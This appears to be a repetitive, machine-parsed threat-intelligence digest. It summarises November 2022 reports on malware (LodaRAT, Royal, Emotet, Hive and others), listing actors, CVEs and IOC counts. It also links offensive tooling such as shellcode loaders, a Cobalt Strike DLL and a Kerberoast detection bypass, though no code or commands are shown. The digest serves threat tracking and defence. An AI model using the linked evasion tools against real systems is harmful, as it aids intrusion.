#ParsedReport
17-11-2022
Cisco Talos Intelligence Blog. Get a Loda This: LodaRAT meets new friends
https://blog.talosintelligence.com/get-a-loda-this
Actors/Campaigns:
Kasablanka (motivation: cyber_espionage)
Threats:
Lodarat
Redline_stealer
Neshta
Venomrat
S500rat
Beacon
Powershell_keylogger_tool
Hvnc_tool
Upx_tool
Industry:
Financial
Geo:
Ethiopia, Peruvian, China
IOCs:
Hash: 5
File: 4
Path: 1
IP: 2
Domain: 2
Softs:
android, windows media player, telegram
Algorithms:
xor
Functions:
EntryPoint
Languages:
delphi, autoit
Platforms:
x86, x64
17-11-2022
Cisco Talos Intelligence Blog. Get a Loda This: LodaRAT meets new friends
https://blog.talosintelligence.com/get-a-loda-this
Actors/Campaigns:
Kasablanka (motivation: cyber_espionage)
Threats:
Lodarat
Redline_stealer
Neshta
Venomrat
S500rat
Beacon
Powershell_keylogger_tool
Hvnc_tool
Upx_tool
Industry:
Financial
Geo:
Ethiopia, Peruvian, China
IOCs:
Hash: 5
File: 4
Path: 1
IP: 2
Domain: 2
Softs:
android, windows media player, telegram
Algorithms:
xor
Functions:
EntryPoint
Languages:
delphi, autoit
Platforms:
x86, x64
Cisco Talos Blog
Get a Loda This: LodaRAT meets new friends
* LodaRAT samples were deployed alongside other malware families, including RedLine and Neshta.
* Cisco Talos identified several variants and altered versions of LodaRAT with updated functionality have been seen in the wild.
* Changes in these LodaRAT variants…
* Cisco Talos identified several variants and altered versions of LodaRAT with updated functionality have been seen in the wild.
* Changes in these LodaRAT variants…
#ParsedReport
17-11-2022
Alert (AA22-320A)
https://us-cert.cisa.gov/ncas/alerts/aa22-320a
Threats:
Log4shell_vuln
Xmrig_miner
Mimikatz_tool
Dumplsass_tool
Credential_stealing_technique
Kerberoasting_technique
Geo:
Iran, Iranian
CVEs:
CVE-2021-44228 [Vulners]
Vulners: Score: 9.3, CVSS: 4.5,
Vulners: Exploitation: True
X-Force: Risk: 10
X-Force: Patch: Official fix
Soft:
- apache log4j (2.0, 2.0, 2.0, 2.0, <2.15.0, <2.3.1, <2.12.2)
- siemens sppa-t3000 ses3000 firmware (*)
- siemens logo\! soft comfort (*)
- siemens spectrum power 4 (4.70, 4.70, <4.70, 4.70)
- siemens siveillance control pro (*)
have more...
TTPs:
Tactics: 8
Technics: 16
IOCs:
File: 14
IP: 4
Domain: 4
Command: 2
Path: 1
Registry: 1
Softs:
vmware horizon, windows defender, psexec, active directory, local security authority, mware horizon se, windows task scheduler, windows registry, microsoft security advisory, windows defender credential guard, have more...
Algorithms:
base64
17-11-2022
Alert (AA22-320A)
https://us-cert.cisa.gov/ncas/alerts/aa22-320a
Threats:
Log4shell_vuln
Xmrig_miner
Mimikatz_tool
Dumplsass_tool
Credential_stealing_technique
Kerberoasting_technique
Geo:
Iran, Iranian
CVEs:
CVE-2021-44228 [Vulners]
Vulners: Score: 9.3, CVSS: 4.5,
Vulners: Exploitation: True
X-Force: Risk: 10
X-Force: Patch: Official fix
Soft:
- apache log4j (2.0, 2.0, 2.0, 2.0, <2.15.0, <2.3.1, <2.12.2)
- siemens sppa-t3000 ses3000 firmware (*)
- siemens logo\! soft comfort (*)
- siemens spectrum power 4 (4.70, 4.70, <4.70, 4.70)
- siemens siveillance control pro (*)
have more...
TTPs:
Tactics: 8
Technics: 16
IOCs:
File: 14
IP: 4
Domain: 4
Command: 2
Path: 1
Registry: 1
Softs:
vmware horizon, windows defender, psexec, active directory, local security authority, mware horizon se, windows task scheduler, windows registry, microsoft security advisory, windows defender credential guard, have more...
Algorithms:
base64
www.cisa.gov
Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester | CISA
From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch (FCEB) organization where CISA observed suspected advanced persistent threat (APT) activity. In the course of incident response activities…
#ParsedReport
17-11-2022
DEV-0569 finds new ways to deliver Royal ransomware, various payloads. Detection details
https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads
Actors/Campaigns:
Dev-0569
Dev-0858
Threats:
Royal_ransomware
Disabling_antivirus_technique
Nsudo_tool
Batloader
Teamviewer_tool
Anydesk_tool
Icedid
Vidar_stealer
Gozi
Z_loader
Cobalt_strike
Beacon
Industry:
Financial
IOCs:
Domain: 2
File: 1
Softs:
microsoft defender, microsoft defender for endpoint, microsoft teams, zoom, telegram, microsoft edge, psexec
Algorithms:
aes
17-11-2022
DEV-0569 finds new ways to deliver Royal ransomware, various payloads. Detection details
https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads
Actors/Campaigns:
Dev-0569
Dev-0858
Threats:
Royal_ransomware
Disabling_antivirus_technique
Nsudo_tool
Batloader
Teamviewer_tool
Anydesk_tool
Icedid
Vidar_stealer
Gozi
Z_loader
Cobalt_strike
Beacon
Industry:
Financial
IOCs:
Domain: 2
File: 1
Softs:
microsoft defender, microsoft defender for endpoint, microsoft teams, zoom, telegram, microsoft edge, psexec
Algorithms:
aes
Microsoft News
DEV-0569 finds new ways to deliver Royal ransomware, various payloads
DEV-0569’s recent activity shows their reliance on malvertising and phishing in delivering malicious payloads. The group’s changes and updates in delivery and payload led to distribution of info stealers and Royal ransomware.
#ParsedReport
18-11-2022
Emotets Vacation is Over: No Rest for the Wicked
https://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked
Threats:
Emotet
Industry:
Financial
IOCs:
Hash: 7
IP: 55
Softs:
microsoft office
Algorithms:
zip, base64, ecdsa, ecdh
Win API:
VirtualAlloc
18-11-2022
Emotets Vacation is Over: No Rest for the Wicked
https://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked
Threats:
Emotet
Industry:
Financial
IOCs:
Hash: 7
IP: 55
Softs:
microsoft office
Algorithms:
zip, base64, ecdsa, ecdh
Win API:
VirtualAlloc
Deep Instinct
Emotet’s Vacation is Over: No Rest for the Wicked | Deep Instinct
Emotet is a prolific malware botnet that originally functioned as a banking trojan when it emerged in 2014. It was spread via spam campaigns, imitating financial statements, transfers, and payment invoices. Emotet is propagated mostly via Office email attachments…
#ParsedReport
18-11-2022
Earth Preta Spear-Phishing Governments Worldwide. Threat hunting
https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html
Actors/Campaigns:
Earth_preta (motivation: cyber_espionage)
Red_delta
Threats:
Toneins
Toneshell
Pubload
Dll_sideloading_technique
Putty_tool
Beacon
Cobalt_strike
Plugx_rat
Industry:
Education, Government
Geo:
Usa, Chinese, Myanmar, China, Taiwan, Asia, Philippines, Japan, Australia, Pacific
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 58
Path: 2
Command: 4
Registry: 1
Hash: 96
IP: 7
Email: 14
Softs:
microsoft office, microsoft silverlight, microsoft word
Algorithms:
aes, rc4, xor, zip
Win API:
OpenEventA, GrayStringW, EnumDateFormatsA, LineDDA, GetForegroundWindow, EnumThreadWindows
Links:
18-11-2022
Earth Preta Spear-Phishing Governments Worldwide. Threat hunting
https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html
Actors/Campaigns:
Earth_preta (motivation: cyber_espionage)
Red_delta
Threats:
Toneins
Toneshell
Pubload
Dll_sideloading_technique
Putty_tool
Beacon
Cobalt_strike
Plugx_rat
Industry:
Education, Government
Geo:
Usa, Chinese, Myanmar, China, Taiwan, Asia, Philippines, Japan, Australia, Pacific
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 58
Path: 2
Command: 4
Registry: 1
Hash: 96
IP: 7
Email: 14
Softs:
microsoft office, microsoft silverlight, microsoft word
Algorithms:
aes, rc4, xor, zip
Win API:
OpenEventA, GrayStringW, EnumDateFormatsA, LineDDA, GetForegroundWindow, EnumThreadWindows
Links:
https://github.com/mxrch/GHunthttps://github.com/Tai7sy/vs-obfuscationhttps://github.com/EricZimmerman/LECmdTrend Micro
Earth Preta Spear-Phishing Governments Worldwide
#ParsedReport
18-11-2022
HZ RAT goes China. Distribution
https://medium.com/@DCSO_CyTec/hz-rat-goes-china-506854c5f2e2
Threats:
Hzrat
Troldesh
Credential_stealing_technique
Cobalt_strike
Beacon
Geo:
China, Netherlands, Australia, Russia, Spain, Chinese
CVEs:
CVE-2017-11882 [Vulners]
Vulners: Score: 9.3, CVSS: 4.8,
Vulners: Exploitation: True
X-Force: Risk: 7.8
X-Force: Patch: Official fix
Soft:
- microsoft office (2013, 2010, 2016, 2007)
TTPs:
Tactics: 1
Technics: 9
IOCs:
Hash: 226
IP: 22
Url: 3
File: 10
Path: 5
Softs:
puttygen, easyconnect, wechat, google chrome, microsoft edge, mozilla firefox
Algorithms:
zip, aes, base64, xor
Functions:
OpenVPN
YARA: Found
Links:
18-11-2022
HZ RAT goes China. Distribution
https://medium.com/@DCSO_CyTec/hz-rat-goes-china-506854c5f2e2
Threats:
Hzrat
Troldesh
Credential_stealing_technique
Cobalt_strike
Beacon
Geo:
China, Netherlands, Australia, Russia, Spain, Chinese
CVEs:
CVE-2017-11882 [Vulners]
Vulners: Score: 9.3, CVSS: 4.8,
Vulners: Exploitation: True
X-Force: Risk: 7.8
X-Force: Patch: Official fix
Soft:
- microsoft office (2013, 2010, 2016, 2007)
TTPs:
Tactics: 1
Technics: 9
IOCs:
Hash: 226
IP: 22
Url: 3
File: 10
Path: 5
Softs:
puttygen, easyconnect, wechat, google chrome, microsoft edge, mozilla firefox
Algorithms:
zip, aes, base64, xor
Functions:
OpenVPN
YARA: Found
Links:
https://github.com/DCSO/Blog\_CyTec/tree/main/2022\_11\_hz\_rat\_goes\_china/hz\_rat\_cnc\_extractorhttps://github.com/DCSO/Blog\_CyTec/tree/main/2022\_11\_hz\_rat\_goes\_china/hz\_rat\_pcap\_decryptorhttps://github.com/WaterJuice/WjCryptLib/tree/e39760a85015b88820d7a2de832155a7c8ff2c88https://github.com/DCSO/Blog\_CyTec/tree/main/2022\_11\_hz\_rat\_goes\_china/yarahttps://github.com/DCSO/Blog\_CyTec/tree/main/2022\_11\_hz\_rat\_goes\_china/hz\_rat\_server\_scannerhttps://gist.github.com/botlabsDev/e8dee63cb4ab957803492a077da64adfhttps://github.com/DCSO/Blog\_CyTec/tree/main/2022\_11\_hz\_rat\_goes\_chinaMedium
HZ RAT goes China
Walking down the Royal Road as we did in one of our previous posts, another by-catch of our Yara rule caught our attention. Turns out we…
#ParsedReport
18-11-2022
Alert (AA22-321A)
https://us-cert.cisa.gov/ncas/alerts/aa22-321a
Threats:
Hive
Vssadmin_tool
Industry:
Healthcare, Government, Financial
Geo:
Canada, Australia
CVEs:
CVE-2020-12812 [Vulners]
Vulners: Score: 7.5, CVSS: 2.6,
Vulners: Exploitation: True
X-Force: Risk: 5.3
X-Force: Patch: Official fix
Soft:
- fortinet fortios (<6.2.4, 6.4.0, <6.0.10)
CVE-2021-31207 [Vulners]
Vulners: Score: 6.5, CVSS: 1.7,
Vulners: Exploitation: True
X-Force: Risk: 6.6
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2013, 2019, 2016, 2016, 2019)
CVE-2021-42321 [Vulners]
Vulners: Score: 6.5, CVSS: 2.8,
Vulners: Exploitation: True
X-Force: Risk: 8.8
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2016, 2019, 2016, 2019)
CVE-2021-34523 [Vulners]
Vulners: Score: 7.5, CVSS: 3.4,
Vulners: Exploitation: True
X-Force: Risk: 9
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2013, 2019, 2016, 2016, 2019)
CVE-2021-34473 [Vulners]
Vulners: Score: 10.0, CVSS: 2.8,
Vulners: Exploitation: True
X-Force: Risk: 9.1
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2013, 2019, 2016, 2016, 2019)
TTPs:
Tactics: 5
Technics: 10
IOCs:
File: 9
Url: 6
Command: 1
Domain: 4
IP: 24
Softs:
microsoft exchange, microsoft exchange server, windows defender, esxi, microsoft windows defender, bcdedit, active directory
Links:
18-11-2022
Alert (AA22-321A)
https://us-cert.cisa.gov/ncas/alerts/aa22-321a
Threats:
Hive
Vssadmin_tool
Industry:
Healthcare, Government, Financial
Geo:
Canada, Australia
CVEs:
CVE-2020-12812 [Vulners]
Vulners: Score: 7.5, CVSS: 2.6,
Vulners: Exploitation: True
X-Force: Risk: 5.3
X-Force: Patch: Official fix
Soft:
- fortinet fortios (<6.2.4, 6.4.0, <6.0.10)
CVE-2021-31207 [Vulners]
Vulners: Score: 6.5, CVSS: 1.7,
Vulners: Exploitation: True
X-Force: Risk: 6.6
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2013, 2019, 2016, 2016, 2019)
CVE-2021-42321 [Vulners]
Vulners: Score: 6.5, CVSS: 2.8,
Vulners: Exploitation: True
X-Force: Risk: 8.8
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2016, 2019, 2016, 2019)
CVE-2021-34523 [Vulners]
Vulners: Score: 7.5, CVSS: 3.4,
Vulners: Exploitation: True
X-Force: Risk: 9
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2013, 2019, 2016, 2016, 2019)
CVE-2021-34473 [Vulners]
Vulners: Score: 10.0, CVSS: 2.8,
Vulners: Exploitation: True
X-Force: Risk: 9.1
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2013, 2019, 2016, 2016, 2019)
TTPs:
Tactics: 5
Technics: 10
IOCs:
File: 9
Url: 6
Command: 1
Domain: 4
IP: 24
Softs:
microsoft exchange, microsoft exchange server, windows defender, esxi, microsoft windows defender, bcdedit, active directory
Links:
https://github.com/cisagov/cset/#ParsedReport
18-11-2022
The Real Cost of Cryptomining: Adversarial Analysis of TeamTNT
https://sysdig.com/blog/real-cost-cryptomining-teamtnt
Actors/Campaigns:
Teamtnt (motivation: cyber_criminal, cyber_espionage, financially_motivated, hacktivism)
Chimaera
Threats:
Hildegard
Xmrig_miner
Xmrigcc_tool
Industry:
Financial, Government
Geo:
Canada, America, Ireland, German, Netherlands, Romania, Germany
Softs:
parrotos, redis, docker, alpine, ubuntu
Links:
18-11-2022
The Real Cost of Cryptomining: Adversarial Analysis of TeamTNT
https://sysdig.com/blog/real-cost-cryptomining-teamtnt
Actors/Campaigns:
Teamtnt (motivation: cyber_criminal, cyber_espionage, financially_motivated, hacktivism)
Chimaera
Threats:
Hildegard
Xmrig_miner
Xmrigcc_tool
Industry:
Financial, Government
Geo:
Canada, America, Ireland, German, Netherlands, Romania, Germany
Softs:
parrotos, redis, docker, alpine, ubuntu
Links:
https://github.com/xmrig/xmrig-proxySysdig
The Real Cost of Cryptomining: Adversarial Analysis of TeamTNT
Sysdig TRT attributed more than $8,100 worth of cryptocurrency to TeamTNT, costing the victims of cryptomining more than $430,000.
#ParsedReport
18-11-2022
AXLocker, Octocrypt, and Alice: Leading a new wave of Ransomware Campaigns
https://blog.cyble.com/2022/11/18/axlocker-octocrypt-and-alice-leading-a-new-wave-of-ransomware-campaigns
Threats:
Axlocker
Octocrypt
Alice_ransomware
Octo
Upx_tool
Industry:
Government, Financial
Geo:
Singapore, Australia, Georgia, India, Dubai
TTPs:
Tactics: 8
Technics: 13
IOCs:
Url: 1
File: 4
Hash: 8
Softs:
discord, opera, telegram
Algorithms:
aes-256-ctr, aes
Functions:
startencryption
Languages:
golang
Platforms:
intel
18-11-2022
AXLocker, Octocrypt, and Alice: Leading a new wave of Ransomware Campaigns
https://blog.cyble.com/2022/11/18/axlocker-octocrypt-and-alice-leading-a-new-wave-of-ransomware-campaigns
Threats:
Axlocker
Octocrypt
Alice_ransomware
Octo
Upx_tool
Industry:
Government, Financial
Geo:
Singapore, Australia, Georgia, India, Dubai
TTPs:
Tactics: 8
Technics: 13
IOCs:
Url: 1
File: 4
Hash: 8
Softs:
discord, opera, telegram
Algorithms:
aes-256-ctr, aes
Functions:
startencryption
Languages:
golang
Platforms:
intel
#ParsedReport
18-11-2022
Disneyland Malware Team: Its a Puny World After All
https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all
Actors/Campaigns:
Disneyland_team
Threats:
Gozi
Industry:
Financial
Geo:
Dubai, Russia, Emirates
IOCs:
Domain: 6
Url: 4
18-11-2022
Disneyland Malware Team: Its a Puny World After All
https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all
Actors/Campaigns:
Disneyland_team
Threats:
Gozi
Industry:
Financial
Geo:
Dubai, Russia, Emirates
IOCs:
Domain: 6
Url: 4
Krebs on Security
Disneyland Malware Team: It’s a Puny World After All
A financial cybercrime group calling itself the Disneyland Team has been making liberal use of visually confusing phishing domains that spoof popular bank brands using Punycode, an Internet standard that allows web browsers to render domain names with non…
#technique
laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.
https://github.com/capt-meelo/laZzzy
laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.
https://github.com/capt-meelo/laZzzy
GitHub
GitHub - capt-meelo/laZzzy: laZzzy is a shellcode loader, developed using different open-source libraries, that demonstrates different…
laZzzy is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques. - capt-meelo/laZzzy
#technique
Relaying to AD Certificate Services over RPC
https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/
Relaying to AD Certificate Services over RPC
https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/
#technique
Titan is a User Defined Reflective DLL ( URDLL ) that uses a combination of techniques to achieve initial execution and maintain shell stability for Cobalt Strike in a modern endpoint-deteciton and response heavy environment.
https://github.com/SecIdiot/titan
Titan is a User Defined Reflective DLL ( URDLL ) that uses a combination of techniques to achieve initial execution and maintain shell stability for Cobalt Strike in a modern endpoint-deteciton and response heavy environment.
https://github.com/SecIdiot/titan
#technique
A simple PoC to invoke an encrypted shellcode by using an hidden call.
https://github.com/enkomio/BrokenFlow
A simple PoC to invoke an encrypted shellcode by using an hidden call.
https://github.com/enkomio/BrokenFlow
GitHub
GitHub - enkomio/BrokenFlow: A simple PoC to invoke an encrypted shellcode by using an hidden call
A simple PoC to invoke an encrypted shellcode by using an hidden call - enkomio/BrokenFlow
#technique
Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types
https://github.com/trustedsec/orpheus
Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types
https://github.com/trustedsec/orpheus
GitHub
GitHub - trustedsec/orpheus: Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types
Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types - trustedsec/orpheus
#ParsedReport
18-11-2022
Netskope Threat Coverage: Prestige Ransomware
https://www.netskope.com/blog/netskope-threat-coverage-prestige-ransomware
Actors/Campaigns:
Dev-0960
Sandworm
Threats:
Prestige_ransomware
Hermeticwiper
Vssadmin_tool
Blackcat
Lockbit
Industry:
Logistic, Transport
Geo:
Ukraine, Russian, Ukrainian, Poland
IOCs:
Path: 7
Command: 1
File: 2
Softs:
windows registry, mssql windows service, mssql, psexec
Algorithms:
aes, lzma, bzip, zipx
Win Services:
MSSQLSERVER
YARA: Found
SIGMA: Found
Links:
18-11-2022
Netskope Threat Coverage: Prestige Ransomware
https://www.netskope.com/blog/netskope-threat-coverage-prestige-ransomware
Actors/Campaigns:
Dev-0960
Sandworm
Threats:
Prestige_ransomware
Hermeticwiper
Vssadmin_tool
Blackcat
Lockbit
Industry:
Logistic, Transport
Geo:
Ukraine, Russian, Ukrainian, Poland
IOCs:
Path: 7
Command: 1
File: 2
Softs:
windows registry, mssql windows service, mssql, psexec
Algorithms:
aes, lzma, bzip, zipx
Win Services:
MSSQLSERVER
YARA: Found
SIGMA: Found
Links:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Prestigehttps://github.com/SigmaHQ/sigmaNetskope
Netskope Threat Coverage: Prestige Ransomware
Summary In October 2022, a novel ransomware named Prestige was found targeting logistics and transportation sectors in Ukraine and Poland. According to
#ParsedReport
18-11-2022
Securonix Threat Labs Security Advisory: Qbot/QakBot Malwares New Initial Execution Uses Grifted Regsvr32 Binary to Run DLL Payload
https://www.securonix.com/blog/qbot-qakbot-malwares-new-initial-execution
Actors/Campaigns:
Steep_maverick
Threats:
Qakbot
TTPs:
Tactics: 2
Technics: 3
IOCs:
Path: 3
File: 7
Command: 1
Hash: 6
Softs:
sysinternals
Algorithms:
zip
Win API:
WmiCreateProcess
18-11-2022
Securonix Threat Labs Security Advisory: Qbot/QakBot Malwares New Initial Execution Uses Grifted Regsvr32 Binary to Run DLL Payload
https://www.securonix.com/blog/qbot-qakbot-malwares-new-initial-execution
Actors/Campaigns:
Steep_maverick
Threats:
Qakbot
TTPs:
Tactics: 2
Technics: 3
IOCs:
Path: 3
File: 7
Command: 1
Hash: 6
Softs:
sysinternals
Algorithms:
zip
Win API:
WmiCreateProcess
Securonix
Securonix Threat Labs Security Advisory: Qbot/QakBot Malware’s New Initial Execution Uses Grifted Regsvr32 Binary to Run DLL Payload
Explore the latest analysis of QakBot malware using obfuscated Regsvr32 binaries to evade detection and infect systems.
#ParsedReport
21-11-2022
ViperSoftX: Hiding in System Logs and Spreading VenomSoftX. Campaign overview
https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/?utm_source=rss&utm_medium=rss&utm_campaign=vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx
Threats:
Vipersoftx
Venomsoftx
Cyberchef_tool
Kraken
Industry:
Financial
Geo:
Italy, Usa, India
IOCs:
File: 3
Path: 8
Url: 2
Domain: 5
Hash: 16
Coin: 17
Softs:
adobe illustrator, corel video studio, microsoft office, task scheduler, chrome, opera, coinbase
Algorithms:
cbc, base64, aes, exhibit
Languages:
javascript, python
Links:
21-11-2022
ViperSoftX: Hiding in System Logs and Spreading VenomSoftX. Campaign overview
https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/?utm_source=rss&utm_medium=rss&utm_campaign=vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx
Threats:
Vipersoftx
Venomsoftx
Cyberchef_tool
Kraken
Industry:
Financial
Geo:
Italy, Usa, India
IOCs:
File: 3
Path: 8
Url: 2
Domain: 5
Hash: 16
Coin: 17
Softs:
adobe illustrator, corel video studio, microsoft office, task scheduler, chrome, opera, coinbase
Algorithms:
cbc, base64, aes, exhibit
Languages:
javascript, python
Links:
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/list\_of\_locations.txt
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/VenomSoftX\_address\_book.txt
https://github.com/avast/ioc/blob/master/ViperSoftX/
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/extraction\_script
https://github.com/avast/ioc/blob/master/ViperSoftX/wallets.csv
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/extraction\_script/extract\_files.py
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/list\_of\_keywords.txtGendigital
ViperSoftX: Hiding in System Logs and Spreading VenomSoftX
Unveiling the Stealth Tactics of ViperSoftX Malware
#ParsedReport
21-11-2022
Mustang PandaClaimloader. Mustang Panda, a Chinese -based base, has a targeted attack on the malware "CLAIMLOADER", is it affected by Japan?
https://www.lac.co.jp/lacwatch/report/20221117_003189.html
Actors/Campaigns:
Red_delta
Threats:
Claimloader
Dll_sideloading_technique
Accevent_tool
Meterpreter_tool
Cobalt_strike
Plugx_rat
Antidebugging_technique
Industry:
Government
Geo:
Myanmar, Chinese, Philippine, Philippines, Asian, Japanese, Thailand, Japan
IOCs:
File: 5
Hash: 14
IP: 6
Softs:
task scheduler
Algorithms:
aes
Win API:
MessageBox
21-11-2022
Mustang PandaClaimloader. Mustang Panda, a Chinese -based base, has a targeted attack on the malware "CLAIMLOADER", is it affected by Japan?
https://www.lac.co.jp/lacwatch/report/20221117_003189.html
Actors/Campaigns:
Red_delta
Threats:
Claimloader
Dll_sideloading_technique
Accevent_tool
Meterpreter_tool
Cobalt_strike
Plugx_rat
Antidebugging_technique
Industry:
Government
Geo:
Myanmar, Chinese, Philippine, Philippines, Asian, Japanese, Thailand, Japan
IOCs:
File: 5
Hash: 14
IP: 6
Softs:
task scheduler
Algorithms:
aes
Win API:
MessageBox
株式会社ラック
中国圏拠点のMustang Pandaがマルウェア「Claimloader」で標的型攻撃、日本にも影響か | LAC WATCH
中国圏を拠点とするMustang Pandaと呼ばれる攻撃者グループがフィリピン政府組織または関連組織を標的としていると考えられる新たな活動を確認しています。この攻撃では、日米比三カ国会議に関連する文書を装ったアーカイブファイルが利用されていました。
#ParsedReport
21-11-2022
Brute Ratel C4 Badger. BRUTE RATEL C4 Badger analyzes actual combat and detection
https://mp.weixin.qq.com/s/Nnag6DSf_wx2YrnTXEwNug
Actors/Campaigns:
Duke
Threats:
Brc4_tool
Cobalt_strike
Beacon
Blackbasta
Sliver_tool
Metasploit_tool
Empire_loader
Industry:
Financial
Geo:
Guangdong
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 4
Softs:
esxi
Algorithms:
base64, ror13, rc4
Functions:
C4
Win API:
NtAllocateVirtualMemoryBadgerShellCode, NtProtectVirtualMemory, NtCreateThreadEx, NtWaitForSingleObject, NtCreateSectionSection, NtMapViewOfSectionsectionRuntimeBroker, RtlExitUserThreadWaitForSingleObject
YARA: Found
21-11-2022
Brute Ratel C4 Badger. BRUTE RATEL C4 Badger analyzes actual combat and detection
https://mp.weixin.qq.com/s/Nnag6DSf_wx2YrnTXEwNug
Actors/Campaigns:
Duke
Threats:
Brc4_tool
Cobalt_strike
Beacon
Blackbasta
Sliver_tool
Metasploit_tool
Empire_loader
Industry:
Financial
Geo:
Guangdong
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 4
Softs:
esxi
Algorithms:
base64, ror13, rc4
Functions:
C4
Win API:
NtAllocateVirtualMemoryBadgerShellCode, NtProtectVirtualMemory, NtCreateThreadEx, NtWaitForSingleObject, NtCreateSectionSection, NtMapViewOfSectionsectionRuntimeBroker, RtlExitUserThreadWaitForSingleObject
YARA: Found